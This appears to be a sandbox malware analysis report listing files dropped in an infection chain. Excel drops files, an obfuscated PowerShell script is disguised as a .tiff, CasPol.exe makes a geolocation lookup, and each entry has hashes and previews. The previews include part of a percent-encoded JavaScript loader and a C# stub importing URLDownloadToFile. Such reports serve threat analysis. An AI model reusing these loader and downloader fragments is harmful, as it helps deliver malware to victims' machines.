                                                                                                                                                                                Preview:<script language=JavaScript>m='%3CScript%20Language%3D%27Javascript%27%3E%0A%3C%21--%20HTML%20Encryption%20provided%20by%20tufat.com%20--%3E%0A%3C%21--%0Adocument.write%28unescape%28%27%253C%2521%2544%254F%2543%2554%2559%2550%2545%2520%2568%2574%256D%256C%253E%250A%253C%256D%2565%2574%2561%2520%2568%2574%2574%2570%252D%2565%2571%2575%2569%2576%253D%2522%2558%252D%2555%2541%252D%2543%256F%256D%2570%2561%2574%2569%2562%256C%2565%2522%2520%2563%256F%256E%2574%2565%256E%2574%253D%2522%2549%2545%253D%2545%256D%2575%256C%2561%2574%2565%2549%2545%2538%2522%2520%253E%250A%253C%2568%2574%256D%256C%253E%250A%253C%2562%256F%2564%2579%253E%250A%253C%2553%2563%2552%2549%2570%2554%2520%2554%2579%2570%2565%253D%2522%2554%2565%2578%2554%252F%2576%2542%2553%2563%2552%2569%2550%2574%2522%253E%250A%2564%2569%254D%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520

                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\creatgoodideaforfuturebusinessdevelopwithnicethingsgetbackon[1].tiff

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with very long lines (378), with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):142260
                                                                                                                                                                                Entropy (8bit):3.6754384164261458
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:kWgwsSmx5nYZjuEoBz/Ib3qBgnM4zBkzLSCL/egt5pzWGwm:pBuYZjubgL6gnMmSfSCLGgt5pyGwm
                                                                                                                                                                                MD5:3EB10EDFAAA09C17D81B1DA5B336684B
                                                                                                                                                                                SHA1:13D5D78340551543986CB92DAB870D552287745B
                                                                                                                                                                                SHA-256:C5F2960ED833EABA3A8B95A0F4253EFBE1A7FD96E303D1731EBCB7E0E54623C8
                                                                                                                                                                                SHA-512:7758740C6663B603F4DB1BDCEA22F89F5C307E93754164C3CBC7F8FCCE7CF7B9E2A251F07522EC6DB8488C4D7FC78BCE6A83B47EFE57436E2E1ACF88F7FE9930
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:..........o.e.c.L.L.i.L.W.W.N.i.W.j.e.L. .=. .".z.Z.Z.z.C.G.I.W.r.W.d.L.K.q.P.".....G.q.u.I.P.W.h.o.G.Z.h.P.i.L.P. .=. .".k.t.z.Z.q.x.K.z.A.G.g.N.b.B.L.".....c.g.p.j.P.P.N.h.K.u.q.e.L.k.t. .=. .".W.A.S.h.W.I.z.L.c.c.K.h.t.P.z.".....x.C.W.Z.q.o.L.i.k.s.P.m.G.i.q. .=. .".W.K.P.L.L.O.W.d.n.G.p.K.L.p.W.".....b.i.q.x.G.K.G.S.m.c.U.i.L.T.K. .=. .".G.W.c.K.L.L.n.n.k.N.A.G.t.h.A.".....P.i.l.h.e.W.R.A.c.K.L.L.H.k.p. .=. .".K.A.W.I.m.e.P.x.L.e.W.i.W.a.u.".........U.u.i.L.i.L.L.L.W.h.m.p.b.Z.j. .=. .".q.A.e.i.v.h.L.t.B.K.A.h.m.G.x.".....L.b.W.o.o.e.z.L.v.G.G.k.p.L.L. .=. .".d.K.a.K.W.u.u.z.L.o.z.f.c.l.e.".....P.p.G.f.z.i.z.Q.G.G.l.k.L.n.u. .=. .".f.i.W.p.Z.W.o.m.l.c.h.J.Q.x.c.".........W.q.p.L.J.L.n.W.h.Q.c.U.e.i.P. .=. .".i.H.h.f.k.W.G.N.W.i.L.W.z.P.i.".....d.W.z.c.h.u.R.Z.m.W.Z.W.W.l.A. .=. .".S.L.t.H.W.m.J.i.e.W.N.k.e.P.c.".....d.i.t.K.m.q.x.W.q.L.j.K.K.L.i. .=. .".L.d.I.K.G.p.o.k.L.q.h.c.o.j.m.".....L.W.q.P.H.q.b.t.n.e.s.W.g.h.f. .=. .".O.W.N.W.S.U.O.Z.A.W.W.K.S.m.G.".....l.u.K.o.n.t.P.J.P.e.

                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json[1].json

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):962
                                                                                                                                                                                Entropy (8bit):5.01360365253241
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:tkluQ+nd66GkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qluQydbauKyGX85jvXhNlT3/7AcV9Wro
                                                                                                                                                                                MD5:04B89191DF339BF9301F6DDC244CE66B
                                                                                                                                                                                SHA1:5E2663E97EFF9ED920A21A1DC6B30254052D5488
                                                                                                                                                                                SHA-256:423447CC5328815B686DE0A284415943D2168F2408BD2F76C067626FC2D6CA9F
                                                                                                                                                                                SHA-512:D6832DD9147DD08489B97591B35DAA6F127EFE20EDE2A802CF90D84A54F358604D5856C8ACC68B42D2AD2DBADDA2F834292888E865C8A7EA2E9464EED34C61E1
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:{. "geoplugin_request":"8.46.123.75",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\390383F9.png

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                File Type:PNG image data, 731 x 391, 8-bit/color RGB, interlaced
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):114223
                                                                                                                                                                                Entropy (8bit):7.9934212565976415
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:1536:cX9THBYT6A17j6ZE4+ZVkVIXMK7MpNc+Bj5uuUBQp12RTmmPHFSTm:QTHBq6U/6xVsMKgpNc+ZwuURRTd9STm
                                                                                                                                                                                MD5:7F72BA3C4366E5F9603DC0FE9C70D4E4
                                                                                                                                                                                SHA1:FA3DACFB4E2ECA8BFAFCCE8BE5ADE7EE7B3722F1
                                                                                                                                                                                SHA-256:4BD578FBCFC208744CFEC575FEC397A77AF66D5688E0C3CD034B4628EFDF910A
                                                                                                                                                                                SHA-512:B8B7B8D4441609F64AF477301355BC8DAE84A16EA595A4923391530F2EE6F4B3F85437541F6408398593D3E1223B56FFCEBEB119C43D97C6213C640799CA6863
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:.PNG........IHDR...............9x....sRGB.........gAMA......a.....pHYs..........+......IDATx^......c7..7z.J !.@..ww.`..........-.......|......d.g..........g...]...*.<.\.l/.......e...w..Q...\.y..qR.0.$&M.D..^....O...M.../...e.6....$..=..M.'a.@JQz.y.....4..a>p.....N.....>E."..z....C...U.W^..qc...Z.f.).........S.D.}...c...t.R.x..e..$...........T.i.&...+J.,...&!f%....;$.+!(.J...ZPe.....RJ..-.Q....l.v..._~.e).....T...a.w.......Jy..E1<>S.....q...T...Z.'.O)A....l..M...Qz.....=...I.3|..}.Y.|....9...6m.0<...q..+V<u......}.](..W_}.....,0U.......[....'.....]..L.2_|..Y.-Z4....N)%A..o..&..{..e.H...../]..[..)..[....9.K...{.c.j-r..o......t.TA............*q..q._}..].4...L..'K.fG..M........,. ....;.]C.[...4i.h......$I.t...E..5..x....>}....N..'L..}.....#+.~.H.N.8A.Pf.M.[.,Xp.%.$....n.:....(..$......N.J+.o.>t1n.8.......#R.{.....^...r..*r+.{.I.7o.V.i.E@.....e.B}G\Dl....R.@.*.u......}..`j..n.8..J.a.g.|-cc..v.Z..-._,Z..{...o..y.f.

                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5F5F3C55.emf

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):582936
                                                                                                                                                                                Entropy (8bit):3.2760774222297435
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:H3sSWYG7THUSEWkMiXE0PwJy/O9ofOy4RSBkYPVnAmN7NMoOFub57NVrNGD5cy/G:H8EGr1wwJymeoSpVnAwfASlNidri2/ON
                                                                                                                                                                                MD5:BB7E0B7055A570167131B2B6861CB461
                                                                                                                                                                                SHA1:0EC5EA433B59E04BD571B763785AD6C78C3D510E
                                                                                                                                                                                SHA-256:E9AD1DC6FD3237803D6B2BA631DA5D70593655E5BAD780E9C383F6509D2B1C3F
                                                                                                                                                                                SHA-512:D3B533C16661C6FD18F3662C6A7257A4771EF27EEDE8F81D69F343EBB511BE99225F336EA357002F0E7EE2A4CD39E53A811527C5A9C928A76D553628501D91A3
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:....l............................T...F.. EMF........m.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................&...........................%...........................6...............%...........L...d...................................!...

                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9E11CDD8.emf

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):582936
                                                                                                                                                                                Entropy (8bit):3.2760774222297435
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:H3sSWYG7THUSEWkMiXE0PwJy/O9ofOy4RSBkYPVnAmN7NMoOFub57NVrNGD5cy/G:H8EGr1wwJymeoSpVnAwfASlNidri2/ON
                                                                                                                                                                                MD5:BB7E0B7055A570167131B2B6861CB461
                                                                                                                                                                                SHA1:0EC5EA433B59E04BD571B763785AD6C78C3D510E
                                                                                                                                                                                SHA-256:E9AD1DC6FD3237803D6B2BA631DA5D70593655E5BAD780E9C383F6509D2B1C3F
                                                                                                                                                                                SHA-512:D3B533C16661C6FD18F3662C6A7257A4771EF27EEDE8F81D69F343EBB511BE99225F336EA357002F0E7EE2A4CD39E53A811527C5A9C928A76D553628501D91A3
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:....l............................T...F.. EMF........m.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................&...........................%...........................6...............%...........L...d...................................!...

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\1sar30q2.sq1.psm1

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:1

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\3xri1vkn.5cn.ps1

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:1

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\4wbm1p0r.mqj.ps1

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:1

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\RES3100.tmp

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x486, 9 symbols, created Mon Nov 25 13:06:47 2024, 1st section name ".debug$S"
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1324
                                                                                                                                                                                Entropy (8bit):3.975057244644361
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:HnM69OxmnF/dHdwKdNWI+ycuZhNskakSVpPNnqSud:HYSbeKd41ulNa3xqSu
                                                                                                                                                                                MD5:5143D715F94DE0D33E778B33ECF0B0D5
                                                                                                                                                                                SHA1:1DFEC5C9C03648E50A35B9C1B86A1A7393C4FD64
                                                                                                                                                                                SHA-256:E266A80FAD311B06F955849BA26A83B5FAA2F8A1949A22AC3B61C9CC3C50ECB8
                                                                                                                                                                                SHA-512:93BA0654EA573C677ABE6F94C3D9B41338996059F38B2BDD974B16D3874CCCA62C96479963462548E1444E81ECB1BA90CF2744E4ABBE77DFBA6FBB4027C0CEF8
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:L...gvDg.............debug$S........H...................@..B.rsrc$01........X.......,...........@..@.rsrc$02........P...6...............@..@........P....c:\Users\user\AppData\Local\Temp\b53lag2c\CSCFF6E95784C84671B5586A4811C47.TMP.....................R....j..S..........4.......C:\Users\user\AppData\Local\Temp\RES3100.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.5.3.l.a.g.2.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\RES77DF.tmp

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Nov 25 13:07:05 2024, 1st section name ".debug$S"
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1328
                                                                                                                                                                                Entropy (8bit):3.9634086106272104
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:HNge9EA2LMBLdHlwKdNWI+ycuZhNGEakSfJPNnqSqd:tL2LMBpmKd41ulGEa3frqSK
                                                                                                                                                                                MD5:7BE07EA9A5052B6BFC7902A79F319DB8
                                                                                                                                                                                SHA1:76653E21CEE380B3E93E28DE7C56F17A59A19908
                                                                                                                                                                                SHA-256:CE1DC0B2B02EC51696AF7E20FD58898C40E868D8561B565E3BC5816845382AA7
                                                                                                                                                                                SHA-512:EE449BF32F38D95F9AD609627A2C50D57ADB30F53B6436CC95184D890532A20D1AB3A6D5EC5DE182DF67DADD6BF105D3D3C2150718E6C2FAB80DC6E105F03439
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:L...yvDg.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........Q....c:\Users\user\AppData\Local\Temp\ovqlooon\CSCADDA0BE83C5E4E17A4EF3CEA725DA.TMP...................h6.z.c0. ...............4.......C:\Users\user\AppData\Local\Temp\RES77DF.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.v.q.l.o.o.o.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\b3qc10xo.3ls.ps1

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:1

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\b53lag2c\CSCFF6E95784C84671B5586A4811C47.TMP

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                File Type:MSVC .res
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):652
                                                                                                                                                                                Entropy (8bit):3.106206409297211
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryWkak7YnqqVpPN5Dlq5J:+RI+ycuZhNskakSVpPNnqX
                                                                                                                                                                                MD5:DFE100111F9152D89A97D7CE6A008F53
                                                                                                                                                                                SHA1:7847FDD597309A023272453723FB24EAE0E65090
                                                                                                                                                                                SHA-256:93111017ADD4A4D2B1262F1F04B8B664730EB5412C2556138A90A02930BE39C5
                                                                                                                                                                                SHA-512:09EDF7587A80796641C90AAA11F15A81398674DFD85B6E45BC85E609CC86D65D5D3FB14A66B845E8FC7C0B8D8D14FDCB1700894500DBDD425E379866C5DDAF93
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.5.3.l.a.g.2.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...b.5.3.l.a.g.2.c...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.0.cs

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (370)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):487
                                                                                                                                                                                Entropy (8bit):3.777856663326396
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:V/DsYLDS81zuNWv/0qRQvFMGHBQXReKJ8SRHy4HqlVzJZLmmlO2FQy:V/DTLDfucvevMXfHqPL2y
                                                                                                                                                                                MD5:41644CC7D79A640ACE6C0FF4910F08CA
                                                                                                                                                                                SHA1:0D5B30A377678B86A4CEAD014E9242C0736E8F3C
                                                                                                                                                                                SHA-256:81FE034A935E362D6704748F50CB1EEE0190456D5A63BB393155D3BA11B5A304
                                                                                                                                                                                SHA-512:C7DF30FE1B121BD4ACCFE50586C523A6EA66811B66AB5A0643CEBF11A093058B09422254088D7380EF02735ACC81B3D28E522FE481B7AF0EC6288DBDC1248F38
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:.using System;.using System.Runtime.InteropServices;..namespace sildbFN.{. public class uAItGV. {. [DllImport("urLmOn", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr maKoAch,string sMNQofrlQE,string hZtVXNOP,uint TLqPzmU,IntPtr PtL);.. }..}.

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.cmdline

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):369
                                                                                                                                                                                Entropy (8bit):5.2455310879497565
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fXmzxs7+AEszIP23fX1yA:p37Lvkmb6KzOWZEoYA
                                                                                                                                                                                MD5:6A1EA56BF8A06283F88E0EB832698754
                                                                                                                                                                                SHA1:041E2A4493DF3FDCADD426280738ACC4A57EEE54
                                                                                                                                                                                SHA-256:8908A8A565B5FC0A2D694DE21D430C767D8BE19B92F19060BFB9ED7064B0F58F
                                                                                                                                                                                SHA-512:33EB158B7DE45A950AB63E686915DC2B64188829E68F6DE3AD8104CFAD89AF648F233DF9B8F7B5A26FA17409B088B574BB1FF1805820C8BC1773E46494F325FC
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.0.cs"

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.dll

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):3072
                                                                                                                                                                                Entropy (8bit):2.84578987995177
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:etGS+PBG5eAdF8sYgkOlqXC2QP9VytkZfiw/MEWI+ycuZhNskakSVpPNnq:6VsAde4l2QPFJj/Mn1ulNa3xq
                                                                                                                                                                                MD5:438F8B78C3D0FB3F4137240C76E799D5
                                                                                                                                                                                SHA1:3AEDA063D1B2E06F9D5B6493353EBFD1FC06E899
                                                                                                                                                                                SHA-256:7E4C0D04A4E10C31C7666BF34AE8C38FB854E7A528C95473215EDA33947F255D
                                                                                                                                                                                SHA-512:DF472AD277AEE644265DB46D196B9F88D4BE427ED9D3F1EB35517D8B23B4A910A67253CC4411EAA9C6C9F9ACD1223DCBFCCC23030AE33ECC7C1828FD8D714E31
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...gvDg...........!.................#... ...@....... ....................................@.................................`#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~...... ...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................6./.....}.....}.......................................... =.....P ......O.........U.....].....h.....q.....y...O.....O...!.O.....O.......!.....*.......=.......................................&..........<Module>.b5

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.out

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                                                                                                                Category:modified
                                                                                                                                                                                Size (bytes):866
                                                                                                                                                                                Entropy (8bit):5.341594780087453
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:AId3ka6KzPEoiKaMD5DqBVKVrdFAMBJTH:Akka60PEoiKdDcVKdBJj
                                                                                                                                                                                MD5:D5D26614DD723A270BBF57EC7505396A
                                                                                                                                                                                SHA1:6C0FC93F6269B09ECE2EE122EF7E7E48D65F4B07
                                                                                                                                                                                SHA-256:794D724BD1ED655377110A6F695CC685CEA083F6A9810FD772D80BC7B398CED2
                                                                                                                                                                                SHA-512:56C4C916BCB86E86E049A509EDAF440C1E4B107E7C011E2FC973059BB79BA13D04BA1615F3228155919081BE9C4C66EC2EBA31626D074C27021754CDF069AF0A
                                                                                                                                                                                Malicious:false
